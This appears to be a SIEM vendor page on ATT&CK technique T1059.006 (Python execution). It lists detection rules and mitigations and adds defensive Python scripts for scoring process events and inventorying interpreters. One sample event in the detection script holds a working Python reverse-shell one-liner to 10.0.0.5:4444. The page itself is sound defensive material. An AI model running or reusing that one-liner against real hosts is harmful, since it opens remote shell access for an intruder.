MaxPatrol SIEM

Detects cyber incidents that undermine a company's cyber resilience

T1059.006: Python

Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language with the capability to perform many functions. Python can be executed interactively from the command line (via the python.exe interpreter on Windows, or python/python3 on Unix-like systems) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

it_bastion: PT-CR-2184: SKDPUNT_Blacklisted_Command: A blacklisted command is executed
mitre_attck_execution: PT-CR-339: Script_Files_Execution: A user attempted to run a script
unix_mitre_attck_execution: PT-CR-1018: Unix_Hacktool_Usage: The rule detects the use of security analysis tools on Unix hosts
unix_mitre_attck_execution: PT-CR-1031: Unix_Inline_Reverse_or_Bind_Shell: Bind or reverse shell creation is detected based on specific command line patterns
unix_mitre_attck_execution: PT-CR-1678: Unix_File_Creation_by_Script: A file was created using a Python or Ruby script
it_bastion: PT-CR-2171: SKDPUNT_Suspicious_Command: A user executed a potentially dangerous command
it_bastion: PT-CR-2177: SKDPUNT_Potentially_Dangerous_Command: Potentially dangerous commands are used
unix_mitre_attck_execution: PT-CR-296: Unix_Reverse_Shell: A reverse-shell connection was created using third-party tools
pt_application_firewall: PT-CR-1915: PTAF_Hacktool_Detected: PT AF detected signs of a hacking tool being used

Detection

ID: DS0009
Data source and component: Process: Process Creation
Description:

Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor newly executed processes that may abuse Python commands and scripts for execution.

ID: DS0017
Data source and component: Command: Command Execution
Description:

Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor executed commands and arguments that may abuse Python commands and scripts for execution.
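The two data sources above (process creation and command execution) can be combined into one scoring check. The script below is an added example written for this page, not MaxPatrol SIEM rule content or code from Positive Technologies. It runs over a constructed set of process-creation events (field names host, user, parent, image and cmdline are assumed and loosely follow what a Sysmon Event ID 1 or auditd EXECVE record carries), applies the indicators the description calls out (inline `-c` code with socket plus subprocess/pty, an interpreter launched from an untrusted path, an Office parent, a script under a user-writable directory, a file-serving module) and weighs them against a site baseline of hosts and accounts where Python use is expected. The baseline, trusted directories, weights and threshold are assumptions to be tuned per environment.

```python
"""Scoring detections for T1059.006 over process-creation / command-execution
events. Added example for this page, not MaxPatrol SIEM rule code.
Event field names (host, user, parent, image, cmdline) are assumed and loosely
follow what a Sysmon Event ID 1 or auditd EXECVE record carries."""
import re

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "web01", "user": "deploy", "parent": "/usr/bin/bash",
     "image": "/usr/bin/python3",
     "cmdline": "python3 /opt/app/manage.py migrate"},
    {"host": "web01", "user": "www-data", "parent": "/usr/sbin/apache2",
     "image": "/usr/bin/python3",
     "cmdline": ("python3 -c 'import socket,subprocess,os;s=socket.socket();"
                 "s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);"
                 "os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
                 "subprocess.call([\"/bin/sh\",\"-i\"])'")},
    {"host": "ws17", "user": "jsmith", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Users\\jsmith\\AppData\\Local\\Temp\\python.exe",
     "cmdline": "python.exe -m http.server 8080"},
    {"host": "ws17", "user": "jsmith",
     "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Python311\\python.exe",
     "cmdline": "python.exe C:\\Users\\jsmith\\Downloads\\invoice.py"},
    {"host": "build02", "user": "ci", "parent": "/usr/bin/bash",
     "image": "/usr/bin/python3", "cmdline": "python3 -m pytest tests/"},
    {"host": "web01", "user": "deploy", "parent": "/usr/bin/bash",
     "image": "/usr/bin/ls", "cmdline": "ls -la /var/log"},
]

# Site-specific baseline: (host, user) pairs where Python use is expected (assumed).
BASELINE = {("web01", "deploy"), ("build02", "ci")}
# Directories holding sanctioned interpreters (assumed; lower-case prefixes).
TRUSTED_IMAGE_DIRS = ("/usr/bin/", "/usr/local/bin/", "c:\\python", "c:\\program files\\")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
PYTHON_IMAGES = {"python", "python3", "python.exe", "python3.exe", "pythonw.exe"}


def basename(path):
    """Last path component, accepting both / and \\ separators."""
    return re.split(r"[\\/]", path)[-1]


def is_python(event):
    return basename(event["image"]).lower() in PYTHON_IMAGES


# Each rule: (name, weight, predicate). Weights are assumed starting points.
RULES = [
    ("inline_code", 2,
     lambda e: re.search(r"(^|\s)-c\s", e["cmdline"]) is not None),
    ("reverse_or_bind_shell", 5,
     lambda e: (re.search(r"import[^'\"]*\bsocket\b", e["cmdline"]) is not None
                and re.search(r"\b(subprocess|pty|dup2)\b", e["cmdline"]) is not None
                and re.search(r"\.(connect|bind)\(", e["cmdline"]) is not None)),
    ("untrusted_interpreter_path", 3,
     lambda e: not e["image"].lower().startswith(TRUSTED_IMAGE_DIRS)),
    ("office_parent", 4,
     lambda e: basename(e["parent"]).lower() in OFFICE_PARENTS),
    ("script_in_user_writable_dir", 2,
     lambda e: re.search(r"(downloads|\\temp\\|/tmp/)\S*\.py\b", e["cmdline"], re.I) is not None),
    ("file_server_module", 2,
     lambda e: re.search(r"-m\s+(http\.server|SimpleHTTPServer)\b", e["cmdline"]) is not None),
    ("outside_baseline", 1,
     lambda e: (e["host"], e["user"]) not in BASELINE),
]


def evaluate(event):
    """Return (score, [rule names]) for a Python process event, or None if not Python."""
    if not is_python(event):
        return None
    hits = [name for name, _, pred in RULES if pred(event)]
    score = sum(w for name, w, _ in RULES if name in hits)
    return score, hits


def scan(events, threshold=3):
    """Alerts for events whose score reaches the threshold."""
    alerts = []
    for e in events:
        result = evaluate(e)
        if result and result[0] >= threshold:
            alerts.append({"host": e["host"], "user": e["user"],
                           "score": result[0], "findings": result[1],
                           "cmdline": e["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a['host']} {a['user']} score={a['score']} {a['findings']}")
```

The baseline term is what keeps the deploy and CI accounts quiet: their routine `manage.py` and `pytest` runs score zero, while the same interpreter spawned by the web-server account with an inline socket/subprocess payload, an interpreter copied into a Temp directory, or a script launched from Word all clear the threshold. Capture the referenced .py file from the file system when an alert fires, as the description recommends, since the command line alone rarely shows what the script does.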

Mitigation

ID: M1038
Name: Execution Prevention
Description:

Denylist Python where not required.

ID: M1047
Name: Audit
Description:

Inventory systems for unauthorized Python installations.
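One way to carry out that inventory on a host, as an added example for this page rather than a Positive Technologies tool: walk the directories that can hold interpreters, match executable files whose names look like a Python interpreter, resolve symlinked aliases, and report anything outside the approved install directories. The directory tree in `demo()` is constructed in a temporary folder so the script runs offline; on a real host you would pass the entries of PATH plus per-user and temp locations as `search_dirs` and the sanctioned install roots as `approved_dirs` (both assumed inputs).

```python
"""Inventory a host for Python interpreters and flag those outside approved
install directories (ATT&CK M1047). Added example for this page, not a
Positive Technologies tool; the directory layout in demo() is constructed."""
import os
import re
import stat
import tempfile
from pathlib import Path

# Matches python, python3, python3.11, pythonw.exe, python3.exe; not python3-config.
PYTHON_NAME = re.compile(r"^python(\d+(\.\d+)?)?w?(\.exe)?$", re.IGNORECASE)


def find_interpreters(search_dirs):
    """Executable files with interpreter-like names in the given directories.
    Paths are resolved so symlinked aliases (python3 -> python3.11) collapse."""
    found = set()
    for d in search_dirs:
        d = Path(d)
        if not d.is_dir():
            continue
        for entry in d.iterdir():
            if entry.is_file() and PYTHON_NAME.match(entry.name) and os.access(entry, os.X_OK):
                found.add(entry.resolve())
    return sorted(found)


def audit(search_dirs, approved_dirs):
    """Split found interpreters into approved and unauthorized by parent directory."""
    approved = {Path(a).resolve() for a in approved_dirs}
    report = {"approved": [], "unauthorized": []}
    for exe in find_interpreters(search_dirs):
        report["approved" if exe.parent in approved else "unauthorized"].append(exe)
    return report


def demo():
    """Build a constructed tree under a temp dir and audit it; returns the
    report with paths relative to that root (POSIX separators)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp).resolve()
        executables = [
            "usr/bin/python3.11",             # sanctioned system install
            "usr/bin/python3",
            "usr/bin/perl",                   # not Python, ignored
            "home/alice/.local/bin/python3",  # user install: unauthorized
            "tmp/.cache/python",              # dropped interpreter: unauthorized
        ]
        for rel in executables:
            f = root / rel
            f.parent.mkdir(parents=True, exist_ok=True)
            f.write_text("#!/bin/sh\n")       # placeholder content
            f.chmod(f.stat().st_mode | stat.S_IXUSR)
        (root / "home/alice/notes").mkdir(parents=True)
        (root / "home/alice/notes/python_tips.txt").write_text("")  # name near-miss
        search = [root / "usr/bin", root / "home/alice/.local/bin",
                  root / "tmp/.cache", root / "home/alice/notes"]
        report = audit(search, [root / "usr/bin"])
        return {k: [p.relative_to(root).as_posix() for p in v] for k, v in report.items()}


if __name__ == "__main__":
    for bucket, paths in demo().items():
        print(bucket, paths)
```

Resolving paths before comparison matters: a `python3` symlink pointing into an unapproved directory is reported by its real location, and two aliases of one binary are counted once. Pair the unauthorized list with the execution-prevention control above so that anything found outside the approved roots is also blocked from running.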

ID: M1049
Name: Antivirus/Antimalware
Description:

Anti-virus can be used to automatically quarantine suspicious files.

ID: M1033
Name: Limit Software Installation
Description:

Prevent users from installing Python where not required.